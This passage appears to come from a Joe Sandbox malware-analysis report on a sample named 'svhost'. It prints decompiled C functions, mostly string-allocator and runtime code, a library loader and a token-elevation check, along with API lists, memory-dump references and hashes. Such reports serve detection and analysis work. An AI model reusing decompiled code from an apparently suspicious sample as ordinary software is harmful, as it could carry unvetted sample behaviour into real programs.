                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00EA30AC
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00EA30C5
                                      • SetLastError.KERNEL32(00000000,?,00EA3087,00EA0A85,00E7144E,00000008,00E7176B,00000008,?,?,?,00E51583,?,00000008,221CAC15), ref: 00EA3117
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLastValue___vcrt_
                                      • String ID:
                                      • API String ID: 3852720340-0
                                      • Opcode ID: e7fc13a8ded0fc1ba66326f3cb800cc13c5f3603a99dfde240e45f0d58b6a5ae
                                      • Instruction ID: 5e5d46d3a6d6c412115880a76b480c83084b25da341a40c71cbd15484e6a0830
                                      • Opcode Fuzzy Hash: e7fc13a8ded0fc1ba66326f3cb800cc13c5f3603a99dfde240e45f0d58b6a5ae
                                      • Instruction Fuzzy Hash: 2301287260A319DDA62026B6BCC69572BD8DBAB379720233EF5147D0F2EF516C059110
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E64DD0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 118COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 96%
                                      			E00E64DD0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8, intOrPtr _a12, char _a16) {
				signed int _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _t61;
				void* _t65;
				signed int _t132;

				_t131 = __esi;
				_t130 = __edi;
				_t94 = __ebx;
				_t61 =  *0xeef074; // 0x221cac15
				_v8 = _t61 ^ _t132;
				_v20 = __ecx;
				_v16 = E00E51100(_v20);
				_v24 =  *((intOrPtr*)(_v16 + 0x10));
				_t65 = E00E596F0(__ebx, _v20, __edi, __esi, __eflags);
				_t9 =  &_v24; // 0xe6417b
				_t139 = _t65 -  *_t9 - _a4;
				if(_t65 -  *_t9 < _a4) {
					E00E5BFD0();
				}
				_t11 =  &_v24; // 0xe6417b
				_v32 =  *_t11 + _a4;
				_v40 =  *((intOrPtr*)(_v16 + 0x14));
				_v36 = E00E5C0F0(_t94, _v20, _v32, _t130, _t131, _t139, _v32);
				_v28 = E00E56580(_v20);
				_v12 = E00E59B70(_v28, _t139,  ~(0 | _t139 > 0x00000000) | _v36 + 0x00000001);
				E00E516F0(_t74, _v16);
				 *((intOrPtr*)(_v16 + 0x10)) = _v32;
				 *((intOrPtr*)(_v16 + 0x14)) = _v36;
				_v48 = E00E51650(_v12);
				if(_v40 < 0x10) {
					_t50 =  &_a16; // 0xe6417b
					_t52 =  &_v24; // 0xe6417b
					E00E64190( &_a8, _v48, _v16,  *_t52, _a12,  *_t50 & 0x000000ff);
					_t125 =  &_v12;
					E00E5B410(_v28, _v28, E00E51650(_v16),  &_v12);
				} else {
					asm("lfence");
					_v44 =  *_v16;
					_t39 =  &_a16; // 0xe6417b
					_t41 =  &_v24; // 0xe6417b
					E00E64190( &_a8, _v48, E00E51650(_v44),  *_t41, _a12,  *_t39 & 0x000000ff);
					E00E59BA0(_v28, _v44, _v40 + 1);
					_t125 = _v12;
					 *_v16 = _v12;
				}
				return E00E89A35(_t94, _v8 ^ _t132, _t125, _t130, _t131);
			}

















                                      0x00e64dd0
                                      0x00e64dd0
                                      0x00e64dd0
                                      0x00e64dd6
                                      0x00e64ddd
                                      0x00e64de0
                                      0x00e64deb
                                      0x00e64df4
                                      0x00e64dfa
                                      0x00e64dff
                                      0x00e64e02
                                      0x00e64e05
                                      0x00e64e07
                                      0x00e64e07
                                      0x00e64e0c
                                      0x00e64e12
                                      0x00e64e1b
                                      0x00e64e2a
                                      0x00e64e35
                                      0x00e64e50
                                      0x00e64e56
                                      0x00e64e61
                                      0x00e64e6a
                                      0x00e64e79
                                      0x00e64e80
                                      0x00e64ed0
                                      0x00e64ed9
                                      0x00e64ee8
                                      0x00e64eed
                                      0x00e64f02
                                      0x00e64e82
                                      0x00e64e82
                                      0x00e64e8a
                                      0x00e64e8d
                                      0x00e64e96
                                      0x00e64eae
                                      0x00e64ec1
                                      0x00e64ec9
                                      0x00e64ecc
                                      0x00e64ecc
                                      0x00e64f1a

                                      APIs
                                        • Part of subcall function 00E596F0: _Max_value.LIBCPMTD ref: 00E59726
                                        • Part of subcall function 00E596F0: _Min_value.LIBCPMTD ref: 00E5974C
                                      • allocator.LIBCONCRTD ref: 00E64E4B
                                      • allocator.LIBCONCRTD ref: 00E64EC1
                                        • Part of subcall function 00E64190: char_traits.LIBCPMTD ref: 00E641BD
                                      • construct.LIBCPMTD ref: 00E64F02
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: allocator$Max_valueMin_valuechar_traitsconstruct
                                      • String ID: {A${A
                                      • API String ID: 92201317-698609641
                                      • Opcode ID: 62253ab8569db0bfa26190b0680c01771402622c66e91fa36a7b0c6d6f563fd9
                                      • Instruction ID: 487186777424f655b88b005d914695bf8b3f4c51169dc012de36217d2ff5ebeb
                                      • Opcode Fuzzy Hash: 62253ab8569db0bfa26190b0680c01771402622c66e91fa36a7b0c6d6f563fd9
                                      • Instruction Fuzzy Hash: 8141C5B5E00109AFCB08DFA8D8919EEB7F5FF88300F149559E915B7391DB30AA44CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E64F20 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 118COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 96%
                                      			E00E64F20(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8, intOrPtr _a12, char _a16) {
				signed int _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _t61;
				void* _t65;
				signed int _t132;

				_t131 = __esi;
				_t130 = __edi;
				_t94 = __ebx;
				_t61 =  *0xeef074; // 0x221cac15
				_v8 = _t61 ^ _t132;
				_v20 = __ecx;
				_v16 = E00E51100(_v20);
				_v24 =  *((intOrPtr*)(_v16 + 0x10));
				_t65 = E00E59FC0(__ebx, _v20, __edi, __esi);
				_t9 =  &_v24; // 0xe64331
				_t139 = _t65 -  *_t9 - _a4;
				if(_t65 -  *_t9 < _a4) {
					E00E5BFD0();
				}
				_t11 =  &_v24; // 0xe64331
				_v32 =  *_t11 + _a4;
				_v40 =  *((intOrPtr*)(_v16 + 0x14));
				_v36 = E00E5BFE0(_t94, _v20, _v32, _t130, _t131, _t139, _v32);
				_v28 = E00E56580(_v20);
				_v12 = E00E5A120(_v28,  ~(0 | _t139 > 0x00000000) | _v36 + 0x00000001);
				E00E516F0(_t74, _v16);
				 *((intOrPtr*)(_v16 + 0x10)) = _v32;
				 *((intOrPtr*)(_v16 + 0x14)) = _v36;
				_v48 = E00E51650(_v12);
				if(_v40 < 8) {
					_t50 =  &_a16; // 0xe64331
					_t52 =  &_v24; // 0xe64331
					E00E64340( &_a8, _v48, _v16,  *_t52, _a12,  *_t50);
					_t125 =  &_v12;
					E00E5B410(_v28, _v28, E00E51650(_v16),  &_v12);
				} else {
					asm("lfence");
					_v44 =  *_v16;
					_t39 =  &_a16; // 0xe64331
					_t41 =  &_v24; // 0xe64331
					E00E64340( &_a8, _v48, E00E51650(_v44),  *_t41, _a12,  *_t39);
					E00E5A150(_v28, _v44, _v40 + 1);
					_t125 = _v12;
					 *_v16 = _v12;
				}
				return E00E89A35(_t94, _v8 ^ _t132, _t125, _t130, _t131);
			}

















                                      0x00e64f20
                                      0x00e64f20
                                      0x00e64f20
                                      0x00e64f26
                                      0x00e64f2d
                                      0x00e64f30
                                      0x00e64f3b
                                      0x00e64f44
                                      0x00e64f4a
                                      0x00e64f4f
                                      0x00e64f52
                                      0x00e64f55
                                      0x00e64f57
                                      0x00e64f57
                                      0x00e64f5c
                                      0x00e64f62
                                      0x00e64f6b
                                      0x00e64f7a
                                      0x00e64f85
                                      0x00e64fa0
                                      0x00e64fa6
                                      0x00e64fb1
                                      0x00e64fba
                                      0x00e64fc9
                                      0x00e64fd0
                                      0x00e6501f
                                      0x00e65027
                                      0x00e65036
                                      0x00e6503b
                                      0x00e65050
                                      0x00e64fd2
                                      0x00e64fd2
                                      0x00e64fda
                                      0x00e64fdd
                                      0x00e64fe5
                                      0x00e64ffd
                                      0x00e65010
                                      0x00e65018
                                      0x00e6501b
                                      0x00e6501b
                                      0x00e65068

                                      APIs
                                        • Part of subcall function 00E59FC0: _Max_value.LIBCPMTD ref: 00E59FF6
                                        • Part of subcall function 00E59FC0: _Min_value.LIBCPMTD ref: 00E5A01C
                                      • allocator.LIBCONCRTD ref: 00E64F9B
                                      • allocator.LIBCPMTD ref: 00E65010
                                      • construct.LIBCPMTD ref: 00E65050
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: allocator$Max_valueMin_valueconstruct
                                      • String ID: 1C$1C
                                      • API String ID: 3172100163-2717644508
                                      • Opcode ID: 4b4ba5edf768413719a9dce836f3ee01de7e990d46bc5e6cf4abd2c9875e3cb9
                                      • Instruction ID: 7c02674e65334d3076a612a9928fbcec0d939f47d5f365a25b9a96bec8bad89d
                                      • Opcode Fuzzy Hash: 4b4ba5edf768413719a9dce836f3ee01de7e990d46bc5e6cf4abd2c9875e3cb9
                                      • Instruction Fuzzy Hash: 7641C6B5E00109AFCB08DFA8D9919EEB7F5FF88300F109569E919B7351D730AA04CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E64810 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 110COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 97%
                                      			E00E64810(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8) {
				signed int _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _t57;
				void* _t61;
				void* _t83;
				signed int _t124;

				_t123 = __esi;
				_t122 = __edi;
				_t90 = __ebx;
				_t57 =  *0xeef074; // 0x221cac15
				_v8 = _t57 ^ _t124;
				_v20 = __ecx;
				_v16 = E00E51100(_v20);
				_t5 =  &_v16; // 0xe6335e
				_v24 =  *((intOrPtr*)( *_t5 + 0x10));
				_t61 = E00E596F0(__ebx, _v20, __edi, __esi, __eflags);
				_t131 = _t61 - _v24 - _a4;
				if(_t61 - _v24 < _a4) {
					E00E5BFD0();
				}
				_v32 = _v24 + _a4;
				_t14 =  &_v16; // 0xe6335e
				_v40 =  *((intOrPtr*)( *_t14 + 0x14));
				_v36 = E00E5C0F0(_t90, _v20, _v32, _t122, _t123, _t131, _v32);
				_v28 = E00E56580(_v20);
				_v12 = E00E59B70(_v28, _t131,  ~(0 | _t131 > 0x00000000) | _v36 + 0x00000001);
				_t27 =  &_v16; // 0xe6335e
				E00E516F0(_t70,  *_t27);
				_t28 =  &_v16; // 0xe6335e
				 *((intOrPtr*)( *_t28 + 0x10)) = _v32;
				_t31 =  &_v16; // 0xe6335e
				 *((intOrPtr*)( *_t31 + 0x14)) = _v36;
				_v48 = E00E51650(_v12);
				if(_v40 < 0x10) {
					_t49 =  &_v16; // 0xe6335e
					_t51 =  &_a8; // 0xe6335e
					E00E63390(_t51, _v48,  *_t49, _v24);
					_t53 =  &_v16; // 0xe6335e
					_t119 =  *_t53;
					E00E5B410( &_v12, _v28, E00E51650( *_t53),  &_v12);
				} else {
					asm("lfence");
					_t37 =  &_v16; // 0xe6335e
					_v44 =  *((intOrPtr*)( *_t37));
					_t83 = E00E51650(_v44);
					_t42 =  &_a8; // 0xe6335e
					E00E63390(_t42, _v48, _t83, _v24);
					E00E59BA0(_v28, _v44, _v40 + 1);
					_t46 =  &_v16; // 0xe6335e
					_t119 =  *_t46;
					 *((intOrPtr*)( *_t46)) = _v12;
				}
				return E00E89A35(_t90, _v8 ^ _t124, _t119, _t122, _t123);
			}


















                                      0x00e64810
                                      0x00e64810
                                      0x00e64810
                                      0x00e64816
                                      0x00e6481d
                                      0x00e64820
                                      0x00e6482b
                                      0x00e6482e
                                      0x00e64834
                                      0x00e6483a
                                      0x00e64842
                                      0x00e64845
                                      0x00e64847
                                      0x00e64847
                                      0x00e64852
                                      0x00e64855
                                      0x00e6485b
                                      0x00e6486a
                                      0x00e64875
                                      0x00e64890
                                      0x00e64893
                                      0x00e64896
                                      0x00e6489b
                                      0x00e648a1
                                      0x00e648a4
                                      0x00e648aa
                                      0x00e648b9
                                      0x00e648c0
                                      0x00e6490b
                                      0x00e64913
                                      0x00e64916
                                      0x00e6491f
                                      0x00e6491f
                                      0x00e64930
                                      0x00e648c2
                                      0x00e648c2
                                      0x00e648c5
                                      0x00e648ca
                                      0x00e648d5
                                      0x00e648e2
                                      0x00e648e5
                                      0x00e648f8
                                      0x00e648fd
                                      0x00e648fd
                                      0x00e64903
                                      0x00e64903
                                      0x00e64948

                                      APIs
                                        • Part of subcall function 00E596F0: _Max_value.LIBCPMTD ref: 00E59726
                                        • Part of subcall function 00E596F0: _Min_value.LIBCPMTD ref: 00E5974C
                                      • allocator.LIBCONCRTD ref: 00E6488B
                                      • allocator.LIBCONCRTD ref: 00E648F8
                                      • construct.LIBCPMTD ref: 00E64930
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: allocator$Max_valueMin_valueconstruct
                                      • String ID: ^3$^3
                                      • API String ID: 3172100163-3838005690
                                      • Opcode ID: b15b31f01437278f21c099e0deeadba5ac6ff7d38fa4b64f600a8bff240d62c5
                                      • Instruction ID: 1f9e6f5b4166e2e53db8b1f0be64d6040e39475be12572306b83047cebdfc7b0
                                      • Opcode Fuzzy Hash: b15b31f01437278f21c099e0deeadba5ac6ff7d38fa4b64f600a8bff240d62c5
                                      • Instruction Fuzzy Hash: D541B7B5E00109AFCB08EFA8D8919EEB7F5FF48300F109569E915B7351DB30AA45CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E66760 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 88COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 96%
                                      			E00E66760(void* __ebx, char __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8, char _a12) {
				signed int _v8;
				char _v12;
				intOrPtr* _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _t42;
				void* _t44;
				signed int _t96;

				_t95 = __esi;
				_t94 = __edi;
				_t69 = __ebx;
				_t42 =  *0xeef074; // 0x221cac15
				_v8 = _t42 ^ _t96;
				_v20 = __ecx;
				_t3 =  &_v20; // 0xe66472
				_t44 = E00E596F0(__ebx,  *_t3, __edi, __esi, __eflags);
				_t102 = _a4 - _t44;
				if(_a4 > _t44) {
					E00E5BFD0();
				}
				_t5 =  &_v20; // 0xe66472
				_v16 = E00E51100( *_t5);
				_v32 =  *((intOrPtr*)(_v16 + 0x14));
				_t11 =  &_v20; // 0xe66472
				_v28 = E00E5C0F0(_t69,  *_t11, _a4, _t94, _t95, _t102, _a4);
				_t13 =  &_v20; // 0xe66472
				_v24 = E00E56580( *_t13);
				_v12 = E00E59B70(_v24, _t102,  ~(0 | _t102 > 0x00000000) | _v28 + 0x00000001);
				E00E516F0(_t53, _v16);
				 *((intOrPtr*)(_v16 + 0x10)) = _a4;
				 *((intOrPtr*)(_v16 + 0x14)) = _v28;
				_t27 =  &_a12; // 0xe66472
				E00E66480( &_a8, E00E51650(_v12), _a4,  *_t27 & 0x000000ff);
				if(_v32 < 0x10) {
					_t93 =  &_v12;
					E00E5B410(_v24, _v24, E00E51650(_v16),  &_v12);
				} else {
					asm("lfence");
					_t93 =  *_v16;
					E00E59BA0(_v24,  *_v16, _v32 + 1);
					 *_v16 = _v12;
				}
				return E00E89A35(_t69, _v8 ^ _t96, _t93, _t94, _t95);
			}













                                      0x00e66760
                                      0x00e66760
                                      0x00e66760
                                      0x00e66766
                                      0x00e6676d
                                      0x00e66770
                                      0x00e66773
                                      0x00e66776
                                      0x00e6677b
                                      0x00e6677e
                                      0x00e66780
                                      0x00e66780
                                      0x00e66785
                                      0x00e6678d
                                      0x00e66796
                                      0x00e6679d
                                      0x00e667a5
                                      0x00e667a8
                                      0x00e667b0
                                      0x00e667cb
                                      0x00e667d1
                                      0x00e667dc
                                      0x00e667e5
                                      0x00e667e8
                                      0x00e66801
                                      0x00e6680a
                                      0x00e6682e
                                      0x00e66843
                                      0x00e6680c
                                      0x00e6680c
                                      0x00e66819
                                      0x00e6681f
                                      0x00e6682a
                                      0x00e6682a
                                      0x00e6685b

                                      APIs
                                        • Part of subcall function 00E596F0: _Max_value.LIBCPMTD ref: 00E59726
                                        • Part of subcall function 00E596F0: _Min_value.LIBCPMTD ref: 00E5974C
                                      • allocator.LIBCONCRTD ref: 00E667C6
                                      • allocator.LIBCONCRTD ref: 00E6681F
                                      • construct.LIBCPMTD ref: 00E66843
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: allocator$Max_valueMin_valueconstruct
                                      • String ID: rd$rd
                                      • API String ID: 3172100163-1634083973
                                      • Opcode ID: 73e5042332a150369fd0effe7970f437e27512062d3da4a216a13a2cd8cb185b
                                      • Instruction ID: f66f28ee89c03693afec66e4a19d0470a6821d998cdc1dd734cbcd8522918076
                                      • Opcode Fuzzy Hash: 73e5042332a150369fd0effe7970f437e27512062d3da4a216a13a2cd8cb185b
                                      • Instruction Fuzzy Hash: A6310B75E10109AFCB08EFA8D8919AFB7B5FF48301F10856DE815B7352DB30AA04CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00EA4102 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMONLIBRARYCODE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00EA4102(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int* _v8;
				void** _t12;
				void* _t16;
				void* _t18;
				signed int _t22;
				WCHAR* _t23;
				void** _t26;
				signed int* _t29;
				void* _t32;
				void* _t34;

				_t29 = _a4;
				while(_t29 != _a8) {
					_t22 =  *_t29;
					_t12 = 0xef3380 + _t22 * 4;
					_t32 =  *_t12;
					_v8 = _t12;
					if(_t32 == 0) {
						_t23 =  *(0xec9790 + _t22 * 4);
						_t32 = LoadLibraryExW(_t23, 0, 0x800);
						if(_t32 != 0) {
							L11:
							_t26 = _v8;
							 *_t26 = _t32;
							if( *_t26 != 0) {
								FreeLibrary(_t32);
							}
							L13:
							if(_t32 != 0) {
								_t16 = _t32;
								L17:
								return _t16;
							}
							L14:
							_t29 =  &(_t29[1]);
							continue;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							_t32 = 0;
							L9:
							if(_t32 != 0) {
								goto L11;
							}
							 *_v8 = _t18 | 0xffffffff;
							goto L14;
						}
						_t18 = E00EB0488(_t23, L"api-ms-", 7);
						_t34 = _t34 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t23, _t32, _t32);
						_t32 = _t18;
						goto L9;
					}
					if(_t32 == 0xffffffff) {
						goto L14;
					}
					goto L13;
				}
				_t16 = 0;
				goto L17;
			}













                                      0x00ea4109
                                      0x00ea419a
                                      0x00ea4111
                                      0x00ea4113
                                      0x00ea411a
                                      0x00ea411c
                                      0x00ea4121
                                      0x00ea412a
                                      0x00ea413f
                                      0x00ea4143
                                      0x00ea4181
                                      0x00ea4181
                                      0x00ea4186
                                      0x00ea418a
                                      0x00ea418d
                                      0x00ea418d
                                      0x00ea4193
                                      0x00ea4195
                                      0x00ea41aa
                                      0x00ea41a5
                                      0x00ea41a9
                                      0x00ea41a9
                                      0x00ea4197
                                      0x00ea4197
                                      0x00000000
                                      0x00ea4197
                                      0x00ea4145
                                      0x00ea414e
                                      0x00ea4171
                                      0x00ea4171
                                      0x00ea4173
                                      0x00ea4175
                                      0x00000000
                                      0x00000000
                                      0x00ea417d
                                      0x00000000
                                      0x00ea417d
                                      0x00ea4158
                                      0x00ea415d
                                      0x00ea4162
                                      0x00000000
                                      0x00000000
                                      0x00ea4167
                                      0x00ea416d
                                      0x00000000
                                      0x00ea416d
                                      0x00ea4126
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00ea4128
                                      0x00ea41a3
                                      0x00000000

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: api-ms-
                                      • API String ID: 0-2084034818
                                      • Opcode ID: 820f941db30c0f7ffbdf8d13c146f8b760d241db38cc280638fb849677a5e7af
                                      • Instruction ID: 703ba05a8c7ff6813784d8fd18872bb4f80a213c4b5c27bfeb2bb031337117ea
                                      • Opcode Fuzzy Hash: 820f941db30c0f7ffbdf8d13c146f8b760d241db38cc280638fb849677a5e7af
                                      • Instruction Fuzzy Hash: 0C11DAB1A03211EBCB218B258C45A9A37989FBA7A4B111524E811BF2D1D7B0FD4185D0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00E70AE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00E70AE0(intOrPtr __ecx) {
				signed int _v8;
				void _v12;
				long _v16;
				void* _v20;
				char _v21;
				char _v22;
				intOrPtr _v28;
				signed int _t20;
				void* _t31;
				void* _t38;
				void* _t39;
				signed int _t40;

				_t20 =  *0xeef074; // 0x221cac15
				_v8 = _t20 ^ _t40;
				_v28 = __ecx;
				_v22 = 0;
				_v20 = 0;
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v20) != 0) {
					_v12 = 0;
					_v16 = 4;
					_t37 =  &_v16;
					if(GetTokenInformation(_v20, 0x14,  &_v12, 4,  &_v16) != 0) {
						if(_v12 == 0) {
							_v21 = 0;
						} else {
							_v21 = 1;
						}
						_t37 = _v21;
						_v22 = _v21;
					}
				}
				if(_v20 != 0) {
					CloseHandle(_v20);
				}
				_t19 =  &_v8; // 0xe55d4a
				return E00E89A35(_t31,  *_t19 ^ _t40, _t37, _t38, _t39);
			}















                                      0x00e70ae6
                                      0x00e70aed
                                      0x00e70af0
                                      0x00e70af3
                                      0x00e70af7
                                      0x00e70b13
                                      0x00e70b17
                                      0x00e70b1a
                                      0x00e70b21
                                      0x00e70b39
                                      0x00e70b3f
                                      0x00e70b47
                                      0x00e70b41
                                      0x00e70b41
                                      0x00e70b41
                                      0x00e70b4b
                                      0x00e70b4e
                                      0x00e70b4e
                                      0x00e70b39
                                      0x00e70b55
                                      0x00e70b5b
                                      0x00e70b5b
                                      0x00e70b64
                                      0x00e70b71

                                      APIs
                                      • GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00E70B04
                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00E70B0B
                                      • GetTokenInformation.ADVAPI32(00000000,00000014(TokenIntegrityLevel),?,00000004,00000004), ref: 00E70B31
                                      • CloseHandle.KERNEL32(00000000), ref: 00E70B5B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
